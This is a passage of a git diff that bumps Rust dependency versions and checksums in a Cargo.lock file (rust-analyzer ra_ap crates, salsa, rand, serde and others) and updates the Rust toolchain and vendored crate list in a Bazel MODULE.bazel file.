[ [[package]] name = "ra_ap_cfg" -version = "0.0.258" +version = "0.0.270" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "921e2b0232d1e8352eb9f476bb55c1d8bcbed0531adc17c74aa711fef015c851" +checksum = "0ef2ba45636c5e585040c0c4bee640737a6001b08309f1a25ca78cf04abfbf90" dependencies = [ "ra_ap_intern", "ra_ap_tt", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "tracing", ] [[package]] name = "ra_ap_edition" -version = "0.0.258" +version = "0.0.270" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a7cc6633305d878cafb4a4482e7e7002d1a5d7b15fa837728b6613ff5336f8a4" +checksum = "8955c1484d5e7274f755187788ba0d51eb149f870c69cdf0d87c3b7edea20ea0" [[package]] name = "ra_ap_hir" -version = "0.0.258" +version = "0.0.270" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6e3f6b31381a297e5bb4fa76108a2cf7bf8d35067a130f932aa6fdfb733ba3a1" +checksum = "a51d7955beff2212701b149bea36d4cf2dc0f5cd129652c9bcf0cb5c0b021078" dependencies = [ "arrayvec", "either", + "indexmap 2.7.0", "itertools 0.12.1", "ra_ap_base_db", "ra_ap_cfg", @@ -1430,7 +1529,7 @@ dependencies = [ "ra_ap_stdx", "ra_ap_syntax", "ra_ap_tt", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "smallvec", "tracing", "triomphe", @@ -1438,14 +1537,14 @@ dependencies = [ [[package]] name = "ra_ap_hir_def" -version = "0.0.258" +version = "0.0.270" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "84144bdda7af170e660d312982889622f4a5361c1bb74df2afa2a6ce17d48644" +checksum = "e5c97e617e4c585d24b3d4f668861452aedddfbe0262f4c53235dcea77e62f9b" dependencies = [ "arrayvec", - "bitflags 2.7.0", + "bitflags 2.8.0", "cov-mark", - "dashmap", + "dashmap 5.5.3", "drop_bomb", "either", "fst", @@ -1454,19 +1553,21 @@ dependencies = [ "itertools 0.12.1", "la-arena", "ra-ap-rustc_abi", + "ra-ap-rustc_hashes", "ra-ap-rustc_parse_format", "ra_ap_base_db", "ra_ap_cfg", "ra_ap_hir_expand", "ra_ap_intern", - "ra_ap_limit", "ra_ap_mbe", + "ra_ap_query-group-macro", "ra_ap_span", "ra_ap_stdx", "ra_ap_syntax", "ra_ap_tt", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "rustc_apfloat", + "salsa", "smallvec", "text-size", "tracing", @@ -1475,9 +1576,9 @@ dependencies = [ [[package]] name = "ra_ap_hir_expand" -version = "0.0.258" +version = "0.0.270" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "441661b394acfa4f3ac4cb54386f8ee8b451504ec167b0bf0e4200da1bbca50d" +checksum = "be57c0d7e3f2180dd8ea584b11447f34060eadc06f0f6d559e2a790f6e91b6c5" dependencies = [ "cov-mark", "either", @@ -1487,15 +1588,16 @@ dependencies = [ "ra_ap_base_db", "ra_ap_cfg", "ra_ap_intern", - "ra_ap_limit", "ra_ap_mbe", "ra_ap_parser", + "ra_ap_query-group-macro", "ra_ap_span", "ra_ap_stdx", "ra_ap_syntax", "ra_ap_syntax-bridge", "ra_ap_tt", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", + "salsa", "smallvec", "tracing", "triomphe", @@ -1503,17 +1605,18 @@ dependencies = [ [[package]] name = "ra_ap_hir_ty" -version = "0.0.258" +version = "0.0.270" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6feea30dff289f33a8ed76172ff4cb299db22d224f88735aa2c7f49ba1e5e77f" +checksum = "f260f35748f3035b46a8afcdebda7cb75d95c24750105fad86101d09a9d387c8" dependencies = [ "arrayvec", - "bitflags 2.7.0", + "bitflags 2.8.0", "chalk-derive", "chalk-ir", "chalk-recursive", "chalk-solve", "cov-mark", + "dashmap 5.5.3", "either", "ena", "indexmap 2.7.0", @@ -1528,12 +1631,13 @@ dependencies = [ "ra_ap_hir_def", "ra_ap_hir_expand", "ra_ap_intern", - "ra_ap_limit", + "ra_ap_query-group-macro", "ra_ap_span", "ra_ap_stdx", "ra_ap_syntax", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "rustc_apfloat", + "salsa", "scoped-tls", "smallvec", "tracing", @@ -1543,14 +1647,15 @@ dependencies = [ [[package]] name = "ra_ap_ide_db" -version = "0.0.258" +version = "0.0.270" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7e33bd5a0139b6c74d34ed963494115abe3f9c95cf5936871ab3d9b548ccbbdf" +checksum = "0426263be26e27cb55a3b9ef88b120511b66fe7d9b418a2473d6d5f3ac2fe0a6" dependencies = [ "arrayvec", - "bitflags 2.7.0", + "bitflags 2.8.0", "cov-mark", "crossbeam-channel", + "dashmap 5.5.3", "either", "fst", "indexmap 2.7.0", @@ -1560,42 +1665,37 @@ dependencies = [ "nohash-hasher", "ra_ap_base_db", "ra_ap_hir", - "ra_ap_limit", "ra_ap_parser", "ra_ap_profile", + "ra_ap_query-group-macro", "ra_ap_span", "ra_ap_stdx", "ra_ap_syntax", + "ra_ap_vfs", "rayon", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", + "salsa", "tracing", "triomphe", ] [[package]] name = "ra_ap_intern" -version = "0.0.258" +version = "0.0.270" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "faa7ee24ae9bf4d2536ef7fb6de35f30856edbf7b3d6ac02e5a2532118896569" +checksum = "f6ea8c9615b3b0688cf557e7310dbd9432f43860c8ea766d54f4416cbecf3571" dependencies = [ - "dashmap", + "dashmap 5.5.3", "hashbrown 0.14.5", - "rustc-hash 2.1.0", - "sptr", + "rustc-hash 2.1.1", "triomphe", ] -[[package]] -name = "ra_ap_limit" -version = "0.0.258" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "90d8a2aecbd488cf79b430bd5abe6650da44ae58b31cd6052c909dbd3f5d5926" - [[package]] name = "ra_ap_load-cargo" -version = "0.0.258" +version = "0.0.270" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6e2372aadd32e85460de595891c8b3562126166bc94fdc24508d6784c9d93357" +checksum = "570907e16725c13a678bfd8050ce8839af2831da042a0878b75ee8c41b0f7b0c" dependencies = [ "anyhow", "crossbeam-channel", @@ -1615,9 +1715,9 @@ dependencies = [ [[package]] name = "ra_ap_mbe" -version = "0.0.258" +version = "0.0.270" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bf69ba82adb6e436617ecd09c0ff58006f376060dff437eb9fd383c2983f6d01" +checksum = "e893fe03b04b30c9b5a339ac2bf39ce32ac9c05a8b50121b7d89ce658346e164" dependencies = [ "arrayvec", "cov-mark", @@ -1629,38 +1729,37 @@ dependencies = [ "ra_ap_syntax", "ra_ap_syntax-bridge", "ra_ap_tt", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "smallvec", "tracing", ] [[package]] name = "ra_ap_parser" -version = "0.0.258" +version = "0.0.270" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8f499b6c33a588d60ed9722d057954a21ec01913b97a5693ff40ba4828ffa7b9" +checksum = "6fd9a264120968b14a66b6ba756cd7f99435385b5dbc2f0a611cf3a12221c385" dependencies = [ "drop_bomb", "ra-ap-rustc_lexer", "ra_ap_edition", - "ra_ap_limit", "tracing", ] [[package]] name = "ra_ap_paths" -version = "0.0.258" +version = "0.0.270" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b5a16df131fa641a4af4d9488152b7b332a6a30e93bc655fdbe88f555ba28825" +checksum = "f47817351651e36b56ff3afc483b41600053c9cb7e67d945467c0abe93416032" dependencies = [ "camino", ] [[package]] name = "ra_ap_proc_macro_api" -version = "0.0.258" +version = "0.0.270" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3480e0d07197ebcc2db5836b0c39625e07b0d77c6471a2a748e5bdf54ce556e3" +checksum = "d96da3b8b9f6b813a98f5357eef303905450741f47ba90adaab8a5371b748416" dependencies = [ "indexmap 2.7.0", "ra_ap_intern", @@ -1668,7 +1767,7 @@ dependencies = [ "ra_ap_span", "ra_ap_stdx", "ra_ap_tt", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "serde", "serde_derive", "serde_json", @@ -1677,21 +1776,21 @@ dependencies = [ [[package]] name = "ra_ap_profile" -version = "0.0.258" +version = "0.0.270" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "95b707dd9c92139030587d81b3333428f48af8f4728330ed12101ab0bb431d72" +checksum = "13637377287c84f88a628e40229d271ef0081c0d683956bd99a6c8278a4f8b14" dependencies = [ "cfg-if", "libc", "perf-event", - "windows-sys 0.52.0", + "windows-sys 0.59.0", ] [[package]] name = "ra_ap_project_model" -version = "0.0.258" +version = "0.0.270" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "551a0de5a16f0538fbaf401a319d81d1a034f7aa014e46ac87c5bd74229a211b" +checksum = "053c5207a638fc7a752c7a454bc952b28b0d02f0bf9f6d7ec785ec809579d8fa" dependencies = [ "anyhow", "cargo_metadata", @@ -1704,7 +1803,7 @@ dependencies = [ "ra_ap_span", "ra_ap_stdx", "ra_ap_toolchain", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "semver", "serde", "serde_derive", @@ -1714,71 +1813,54 @@ dependencies = [ ] [[package]] -name = "ra_ap_salsa" -version = "0.0.258" +name = "ra_ap_query-group-macro" +version = "0.0.270" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6ec0c82d9e5affbf7d582750b301d279589787a5ac729f95756f5a0b0bf2b4a4" +checksum = "0f1a38f07b442e47a234cbe2e8fd1b8a41ff0cc5123cb1cf994c5ce20edb5bd6" dependencies = [ - "indexmap 2.7.0", - "itertools 0.12.1", - "lock_api", - "oorandom", - "parking_lot", - "ra_ap_salsa-macros", - "rustc-hash 2.1.0", - "smallvec", - "tracing", - "triomphe", -] - -[[package]] -name = "ra_ap_salsa-macros" -version = "0.0.258" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8440192eb549dda1cdefc95eaa1fc42ad13cfbd303add757517d77c81e7dc2e1" -dependencies = [ - "heck 0.4.1", + "heck", "proc-macro2", "quote", + "salsa", "syn", ] [[package]] name = "ra_ap_span" -version = "0.0.258" +version = "0.0.270" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "18690685d10da2577d7821d46c0de5a884bf1755e59635cbb1a795451e2a4acc" +checksum = "8818680c6f7da3b32cb2bb0992940b24264b1aa90203aa94812e09ab34d362d1" dependencies = [ "hashbrown 0.14.5", "la-arena", - "ra_ap_salsa", "ra_ap_stdx", "ra_ap_syntax", "ra_ap_vfs", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", + "salsa", "text-size", ] [[package]] name = "ra_ap_stdx" -version = "0.0.258" +version = "0.0.270" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4016934faae8413b4ad3f1bf063c7ffccdcfdf3f67ff32f4a79a197a3c1cb0da" +checksum = "f1c10bee1b03fc48083862c13cf06bd3ed17760463ecce2734103a2f511e5ed4" dependencies = [ - "always-assert", "crossbeam-channel", "itertools 0.12.1", "jod-thread", "libc", "miow", - "windows-sys 0.52.0", + "tracing", + "windows-sys 0.59.0", ] [[package]] name = "ra_ap_syntax" -version = "0.0.258" +version = "0.0.270" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e8e381d21d166d12b11906171f82382473d60abfead0c4acc6d7d07150f87f73" +checksum = "92bc32f3946fc5fcbdc79e61b7e26a8c2a3a56f3ef6ab27c7d298a9e21a462f2" dependencies = [ "cov-mark", "either", @@ -1788,7 +1870,7 @@ dependencies = [ "ra_ap_parser", "ra_ap_stdx", "rowan", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "smol_str", "tracing", "triomphe", @@ -1796,9 +1878,9 @@ dependencies = [ [[package]] name = "ra_ap_syntax-bridge" -version = "0.0.258" +version = "0.0.270" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "65f1960218acd2ed8e486e7bd24f80a7eb89591906c6b0831296b2a75c556b2f" +checksum = "a42052c44c98c122c37aac476260c8f19d8fec495edc9c05835307c9ae86194d" dependencies = [ "ra_ap_intern", "ra_ap_parser", @@ -1806,15 +1888,15 @@ dependencies = [ "ra_ap_stdx", "ra_ap_syntax", "ra_ap_tt", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "tracing", ] [[package]] name = "ra_ap_toolchain" -version = "0.0.258" +version = "0.0.270" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c9195f69ff02f076f5a726c7fbafa2b4639d00235906cb44e52ca75cd8b33c30" +checksum = "75996e70b3a0c68cd5157ba01f018964c7c6a5d7b209047d449b393139d0b57f" dependencies = [ "camino", "home", @@ -1822,9 +1904,9 @@ dependencies = [ [[package]] name = "ra_ap_tt" -version = "0.0.258" +version = "0.0.270" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8ac261d79d3ec475a1f3b2a758d3e466f2b9d7d883fb72239b06979bf6880018" +checksum = "0e4ee31e93bfabe83e6720b7469db88d7ad7ec5c59a1f011efec4aa1327ffc5c" dependencies = [ "arrayvec", "ra-ap-rustc_lexer", @@ -1835,9 +1917,9 @@ dependencies = [ [[package]] name = "ra_ap_vfs" -version = "0.0.258" +version = "0.0.270" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ee35a171beccbb01b4ede1d9ad91dee487a3742d7cc39efd7aed6961027cbe78" +checksum = "f6aac1e277ac70bb073f40f8a3fc44e4b1bb9e4d4b1d0e0bd2f8269543560f80" dependencies = [ "crossbeam-channel", "fst", @@ -1845,15 +1927,15 @@ dependencies = [ "nohash-hasher", "ra_ap_paths", "ra_ap_stdx", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "tracing", ] [[package]] name = "ra_ap_vfs-notify" -version = "0.0.258" +version = "0.0.270" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b234b7651eb5d61f18d4f4643590bb8b1fd59ef766a1059741c09c540ec8cd86" +checksum = "cd95285146049621ee8f7a512c982a008bf036321fcc9b01a95c1ad7e6aeae57" dependencies = [ "crossbeam-channel", "notify", @@ -1861,27 +1943,27 @@ dependencies = [ "ra_ap_stdx", "ra_ap_vfs", "rayon", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "tracing", "walkdir", ] [[package]] name = "rand" -version = "0.8.5" +version = "0.9.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "34af8d1a0e25924bc5b7c43c079c942339d8f0a8b57c39049bef581b46327404" +checksum = "3779b94aeb87e8bd4e834cee3650289ee9e0d5677f976ecdb6d219e5f4f6cd94" dependencies = [ - "libc", "rand_chacha", "rand_core", + "zerocopy 0.8.20", ] [[package]] name = "rand_chacha" -version = "0.3.1" +version = "0.9.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e6c10a63a0fa32252be49d21e7709d4d4baf8d231c2dbce1eaa8141b9b127d88" +checksum = "d3022b5f1df60f26e1ffddd6c66e8aa15de382ae63b3a0c1bfc0e4d3e3f325cb" dependencies = [ "ppv-lite86", "rand_core", @@ -1889,11 +1971,12 @@ dependencies = [ [[package]] name = "rand_core" -version = "0.6.4" +version = "0.9.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ec0be4795e2f6a28069bec0b5ff3e2ac9bafc99e6a9a7dc3547996c5c816922c" +checksum = "7a509b1a2ffbe92afab0e55c8fd99dea1c280e8171bd2d88682bb20bc41cbc2c" dependencies = [ "getrandom", + "zerocopy 0.8.20", ] [[package]] @@ -1922,7 +2005,7 @@ version = "0.5.8" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "03a862b389f93e68874fbf580b9de08dd02facb9a788ebadaf4a3fd33cf58834" dependencies = [ - "bitflags 2.7.0", + "bitflags 2.8.0", ] [[package]] @@ -1998,9 +2081,15 @@ checksum = "08d43f7aa6b08d49f382cde6a7982047c3426db949b1424bc4b7ec9ae12c6ce2" [[package]] name = "rustc-hash" -version = "2.1.0" +version = "2.1.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c7fb8039b3032c191086b10f11f319a6e99e1e82889c5cc6046f515c9db1d497" +checksum = "357703d41365b4b27c590e3ed91eabb1b663f07c4c084095e60cbed4362dff0d" + +[[package]] +name = "rustc-stable-hash" +version = "0.1.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2febf9acc5ee5e99d1ad0afcdbccc02d87aa3f857a1f01f825b80eacf8edfcd1" [[package]] name = "rustc_apfloat" @@ -2011,11 +2100,58 @@ dependencies = [ "smallvec", ] +[[package]] +name = "rustversion" +version = "1.0.20" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "eded382c5f5f786b989652c49544c4877d9f015cc22e145a5ea8ea66c2921cd2" + [[package]] name = "ryu" -version = "1.0.18" +version = "1.0.19" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6ea1a2d0a644769cc99faa24c3ad26b379b786fe7c36fd3c546254801650e6dd" + +[[package]] +name = "salsa" +version = "0.19.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "dd55c6549513b2a42884dae31e3d4f4ac8a6cc51062e68e24d162133889f327c" +dependencies = [ + "boxcar", + "crossbeam-queue", + "dashmap 6.1.0", + "hashbrown 0.15.2", + "hashlink", + "indexmap 2.7.0", + "parking_lot", + "portable-atomic", + "rayon", + "rustc-hash 2.1.1", + "salsa-macro-rules", + "salsa-macros", + "smallvec", + "tracing", +] + +[[package]] +name = "salsa-macro-rules" +version = "0.19.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f3cb5ba0dc43242ce17de99c180e96db90b235b8a9fdc9543c96d2209116bd9f" +checksum = "2619b4b451beab0a7e4364ff1e6f31950e7e418888fd9bf2f28889671563166a" + +[[package]] +name = "salsa-macros" +version = "0.19.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "4be57a99b3896e8d26850428a6874fb86849e2db874e1db3528e5cee4337d277" +dependencies = [ + "heck", + "proc-macro2", + "quote", + "syn", + "synstructure", +] [[package]] name = "same-file" @@ -2049,18 +2185,18 @@ dependencies = [ [[package]] name = "serde" -version = "1.0.217" +version = "1.0.219" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "02fc4265df13d6fa1d00ecff087228cc0a2b5f3c0e87e258d8b94a156e984c70" +checksum = "5f0e2c6ed6606019b4e29e69dbaba95b11854410e5347d525002456dbbb786b6" dependencies = [ "serde_derive", ] [[package]] name = "serde_derive" -version = "1.0.217" +version = "1.0.219" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5a9bf7cf98d04a2b28aead066b7496853d4779c9cc183c440dbac457641e19a0" +checksum = "5b0276cf7f2c73365f7157c8123c21cd9a50fbbd844757af28ca1f5925fc2a00" dependencies = [ "proc-macro2", "quote", @@ -2069,9 +2205,9 @@ dependencies = [ [[package]] name = "serde_json" -version = "1.0.135" +version = "1.0.140" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2b0d7ba2887406110130a978386c4e1befb98c674b4fba677954e4db976630d9" +checksum = "20068b6e96dc6c9bd23e01df8827e6c7e1f2fddd43c21810382803c136b99373" dependencies = [ "itoa", "memchr", @@ -2148,9 +2284,9 @@ checksum = "0fda2ff0d084019ba4d7c6f371c95d8fd75ce3524c3cb8fb653a3023f6323e64" [[package]] name = "smallvec" -version = "1.13.2" +version = "1.14.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3c5e1a9a646d36c3599cd173a41282daf47c44583ad367b8e6837255952e5c67" +checksum = "7fcf8323ef1faaee30a44a340193b1ac6814fd9b7b4e88e9d4519a3e4abe1cfd" [[package]] name = "smol_str" @@ -2162,12 +2298,6 @@ dependencies = [ "serde", ] -[[package]] -name = "sptr" -version = "0.3.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3b9b39299b249ad65f3b7e96443bad61c02ca5cd3589f46cb6d610a0fd6c0d6a" - [[package]] name = "stable_deref_trait" version = "1.2.0" @@ -2188,9 +2318,9 @@ checksum = "7da8b5736845d9f2fcb837ea5d9e2628564b3b043a70948a3f0b778838c5fb4f" [[package]] name = "syn" -version = "2.0.96" +version = "2.0.100" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d5d0adab1ae378d7f53bdebc67a39f1f151407ef230f0ce2883572f5d8985c80" +checksum = "b09a44accad81e1ba1cd74a32461ba89dee89095ba17b32f5d03683b1b1fc2a0" dependencies = [ "proc-macro2", "quote", @@ -2277,9 +2407,9 @@ dependencies = [ [[package]] name = "toml" -version = "0.8.19" +version = "0.8.20" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a1ed1f98e3fdc28d6d910e6737ae6ab1a93bf1985935a1193e68f93eeb68d24e" +checksum = "cd87a5cdd6ffab733b2f74bc4fd7ee5fff6634124999ac278c35fc78c6120148" dependencies = [ "serde", "serde_spanned", @@ -2298,9 +2428,9 @@ dependencies = [ [[package]] name = "toml_edit" -version = "0.22.22" +version = "0.22.24" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4ae48d6208a266e853d946088ed816055e556cc6028c5e8e2b84d9fa5dd7c7f5" +checksum = "17b4795ff5edd201c7cd6dca065ae59972ce77d1b80fa0a84d94950ece7d1474" dependencies = [ "indexmap 2.7.0", "serde", @@ -2358,7 +2488,7 @@ version = "0.2.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "ee855f1f400bd0e5c02d150ae5de3840039a3f54b025156404e34c23c03f47c3" dependencies = [ - "log 0.4.22", + "log 0.4.25", "once_cell", "tracing-core", ] @@ -2473,9 +2603,9 @@ checksum = "a3e5df347f0bf3ec1d670aad6ca5c6a1859cd9ea61d2113125794654ccced68f" [[package]] name = "unicode-ident" -version = "1.0.14" +version = "1.0.16" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "adb9e6ca4f869e1180728b7950e35922a7fc6397f7b641499e8f3ef06e50dc83" +checksum = "a210d160f08b701c8721ba1c726c11662f877ea6b7094007e1ca9a1041945034" [[package]] name = "unicode-properties" @@ -2529,6 +2659,15 @@ version = "0.11.0+wasi-snapshot-preview1" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "9c8d87e72b64a3b4db28d11ce29237c246188f4f51057d65a7eab63b7987e423" +[[package]] +name = "wasi" +version = "0.13.3+wasi-0.2.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "26816d2e1a4a36a2940b96c5296ce403917633dff8f3440e9b236ed6f6bacad2" +dependencies = [ + "wit-bindgen-rt", +] + [[package]] name = "wasm-bindgen" version = "0.2.99" @@ -2547,7 +2686,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "5f89bb38646b4f81674e8f5c3fb81b562be1fd936d84320f3264486418519c79" dependencies = [ "bumpalo", - "log 0.4.22", + "log 0.4.25", "proc-macro2", "quote", "syn", @@ -2614,6 +2753,16 @@ version = "0.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f" +[[package]] +name = "windows" +version = "0.58.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "dd04d41d93c4992d421894c18c8b43496aa748dd4c081bac0dc93eb0489272b6" +dependencies = [ + "windows-core 0.58.0", + "windows-targets 0.52.6", +] + [[package]] name = "windows-core" version = "0.52.0" @@ -2623,6 +2772,66 @@ dependencies = [ "windows-targets 0.52.6", ] +[[package]] +name = "windows-core" +version = "0.58.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6ba6d44ec8c2591c134257ce647b7ea6b20335bf6379a27dac5f1641fcf59f99" +dependencies = [ + "windows-implement", + "windows-interface", + "windows-result", + "windows-strings", + "windows-targets 0.52.6", +] + +[[package]] +name = "windows-implement" +version = "0.58.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2bbd5b46c938e506ecbce286b6628a02171d56153ba733b6c741fc627ec9579b" +dependencies = [ + "proc-macro2", + "quote", + "syn", +] + +[[package]] +name = "windows-interface" +version = "0.58.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "053c4c462dc91d3b1504c6fe5a726dd15e216ba718e84a0e46a88fbe5ded3515" +dependencies = [ + "proc-macro2", + "quote", + "syn", +] + +[[package]] +name = "windows-link" +version = "0.1.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "76840935b766e1b0a05c0066835fb9ec80071d4c09a16f6bd5f7e655e3c14c38" + +[[package]] +name = "windows-result" +version = "0.2.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1d1043d8214f791817bab27572aaa8af63732e11bf84aa21a45a78d6c317ae0e" +dependencies = [ + "windows-targets 0.52.6", +] + +[[package]] +name = "windows-strings" +version = "0.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "4cd9b125c486025df0eabcb585e62173c6c9eddcec5d117d3b6e8c30e2ee4d10" +dependencies = [ + "windows-result", + "windows-targets 0.52.6", +] + [[package]] name = "windows-sys" version = "0.48.0" @@ -2773,13 +2982,22 @@ checksum = "589f6da84c646204747d1270a2a5661ea66ed1cced2631d546fdfb155959f9ec" [[package]] name = "winnow" -version = "0.6.24" +version = "0.7.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c8d71a593cc5c42ad7876e2c1fda56f314f3754c084128833e64f1345ff8a03a" +checksum = "0e7f4ea97f6f78012141bcdb6a216b2609f0979ada50b20ca5b52dde2eac2bb1" dependencies = [ "memchr", ] +[[package]] +name = "wit-bindgen-rt" +version = "0.33.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3268f3d866458b787f390cf61f4bbb563b922d091359f9608842999eaee3943c" +dependencies = [ + "bitflags 2.8.0", +] + [[package]] name = "yansi" version = "1.0.1" @@ -2793,7 +3011,16 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "1b9b4fd18abc82b8136838da5d50bae7bdea537c574d8dc1a34ed098d6c166f0" dependencies = [ "byteorder", - "zerocopy-derive", + "zerocopy-derive 0.7.35", +] + +[[package]] +name = "zerocopy" +version = "0.8.20" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "dde3bb8c68a8f3f1ed4ac9221aad6b10cece3e60a8e2ea54a6a2dec806d0084c" +dependencies = [ + "zerocopy-derive 0.8.20", ] [[package]] @@ -2806,3 +3033,14 @@ dependencies = [ "quote", "syn", ] + +[[package]] +name = "zerocopy-derive" +version = "0.8.20" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "eea57037071898bf96a6da35fd626f4f27e9cee3ead2a6c703cf09d472b2e700" +dependencies = [ + "proc-macro2", + "quote", + "syn", +] diff --git a/MODULE.bazel b/MODULE.bazel index 427f450e7fcf..fe418cd40c6d 100644 --- a/MODULE.bazel +++ b/MODULE.bazel @@ -28,16 +28,16 @@ bazel_dep(name = "rules_kotlin", version = "2.0.0-codeql.1") bazel_dep(name = "gazelle", version = "0.40.0") bazel_dep(name = "rules_dotnet", version = "0.17.4") bazel_dep(name = "googletest", version = "1.14.0.bcr.1") -bazel_dep(name = "rules_rust", version = "0.57.1") +bazel_dep(name = "rules_rust", version = "0.58.0") bazel_dep(name = "zstd", version = "1.5.5.bcr.1") bazel_dep(name = "buildifier_prebuilt", version = "6.4.0", dev_dependency = True) # Keep edition and version approximately in sync with internal repo. # the versions there are canonical, the versions here are used for CI in github/codeql, as well as for the vendoring of dependencies. -RUST_EDITION = "2021" +RUST_EDITION = "2024" -RUST_VERSION = "1.82.0" +RUST_VERSION = "1.85.0" rust = use_extension("@rules_rust//rust:extensions.bzl", "rust") rust.toolchain( @@ -71,57 +71,59 @@ use_repo( tree_sitter_extractors_deps = use_extension("//misc/bazel/3rdparty:tree_sitter_extractors_extension.bzl", "r") use_repo( tree_sitter_extractors_deps, - "vendor__anyhow-1.0.95", - "vendor__argfile-0.2.1", - "vendor__chrono-0.4.39", - "vendor__clap-4.5.26", - "vendor__dunce-1.0.5", - "vendor__either-1.13.0", - "vendor__encoding-0.2.33", - "vendor__figment-0.10.19", - "vendor__flate2-1.0.35", - "vendor__glob-0.3.2", - "vendor__globset-0.4.15", - "vendor__itertools-0.14.0", - "vendor__lazy_static-1.5.0", - "vendor__mustache-0.9.0", - "vendor__num-traits-0.2.19", - "vendor__num_cpus-1.16.0", - "vendor__proc-macro2-1.0.93", - "vendor__quote-1.0.38", - "vendor__ra_ap_base_db-0.0.258", - "vendor__ra_ap_cfg-0.0.258", - "vendor__ra_ap_hir-0.0.258", - "vendor__ra_ap_hir_def-0.0.258", - "vendor__ra_ap_hir_expand-0.0.258", - "vendor__ra_ap_ide_db-0.0.258", - "vendor__ra_ap_intern-0.0.258", - "vendor__ra_ap_load-cargo-0.0.258", - "vendor__ra_ap_parser-0.0.258", - "vendor__ra_ap_paths-0.0.258", - "vendor__ra_ap_project_model-0.0.258", - "vendor__ra_ap_span-0.0.258", - "vendor__ra_ap_stdx-0.0.258", - "vendor__ra_ap_syntax-0.0.258", - "vendor__ra_ap_vfs-0.0.258", - "vendor__rand-0.8.5", - "vendor__rayon-1.10.0", - "vendor__regex-1.11.1", - "vendor__serde-1.0.217", - "vendor__serde_json-1.0.135", - "vendor__serde_with-3.12.0", - "vendor__syn-2.0.96", - "vendor__toml-0.8.19", - "vendor__tracing-0.1.41", - "vendor__tracing-flame-0.2.0", - "vendor__tracing-subscriber-0.3.19", - "vendor__tree-sitter-0.24.6", - "vendor__tree-sitter-embedded-template-0.23.2", - "vendor__tree-sitter-json-0.24.8", - "vendor__tree-sitter-ql-0.23.1", - "vendor__tree-sitter-ruby-0.23.1", - 